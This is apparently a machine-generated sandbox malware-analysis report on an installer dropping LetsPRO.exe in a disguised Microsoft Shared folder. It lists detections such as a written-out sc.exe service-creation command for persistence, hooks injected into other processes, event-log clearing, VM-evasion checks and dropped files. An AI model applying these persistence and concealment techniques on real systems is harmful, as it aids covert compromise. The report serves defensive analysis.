Source: unknown Process created: C:\Windows\System32\sc.exe sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 4320 base: 590007 value: E9 EB DF 99 76 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 4320 base: 76F2DFF0 value: E9 1E 20 66 89 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 4564 base: 570007 value: E9 EB DF 9B 76 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 4564 base: 76F2DFF0 value: E9 1E 20 64 89 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 5440 base: 540007 value: E9 EB DF 9E 76 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 5440 base: 76F2DFF0 value: E9 1E 20 61 89 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 4912 base: 1F00007 value: E9 EB DF 02 75 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 4912 base: 76F2DFF0 value: E9 1E 20 FD 8A Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 5480 base: 540007 value: E9 EB DF 9E 76 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 5480 base: 76F2DFF0 value: E9 1E 20 61 89 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 5520 base: 2000007 value: E9 EB DF F2 74 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 5520 base: 76F2DFF0 value: E9 1E 20 0D 8B Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 412 base: 690007 value: E9 EB DF 89 76 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 412 base: 76F2DFF0 value: E9 1E 20 76 89 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 6408 base: 580007 value: E9 EB DF 9A 76 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 6408 base: 76F2DFF0 value: E9 1E 20 65 89 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 7224 base: 2040007 value: E9 EB DF EE 74
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 7224 base: 76F2DFF0 value: E9 1E 20 11 8B
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 7232 base: 590007 value: E9 EB DF 99 76
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 7232 base: 76F2DFF0 value: E9 1E 20 66 89
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 7268 base: 690007 value: E9 EB DF 89 76
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 7268 base: 76F2DFF0 value: E9 1E 20 76 89
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 7284 base: 590007 value: E9 EB DF 99 76
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 7284 base: 76F2DFF0 value: E9 1E 20 66 89
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 7380 base: 590007 value: E9 EB DF 99 76
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Memory written: PID: 7380 base: 76F2DFF0 value: E9 1E 20 66 89
Contains functionality to clear windows event logs (to hide its activities)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F3B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog, 4_2_03F3B3C0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94A2E7 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress, 5_2_6C94A2E7
Stores large binary data to the registry
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Key value created or modified: HKEY_CURRENT_USER\Console\0 d33f351a4aeea5e608853d1a56661059 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found evasive API chain checking for user administrative privileges
Source: C:\Program Files (x86)\ChromeSetup.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode
Found stalling execution ending in API Sleep call
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Stalling execution: Execution stalls by calling Sleep
Tries to evade analysis by execution special instruction (VM detection)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Special instruction interceptor: First address: 10D98209 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Window / User API: threadDelayed 656 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Window / User API: threadDelayed 460 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Window / User API: threadDelayed 2633 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Window / User API: threadDelayed 3264 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Window / User API: threadDelayed 1615 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sw.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ta.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hu.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_is.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-PT.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_iw.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_et.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_no.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_te.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine_64.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ko.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ja.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser_64.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\WeGame\beacon_sdk.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sl.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fil.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-CN.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fa.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ms.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\WeGame\common.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIB59C.tmp Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dll Jump to dropped file
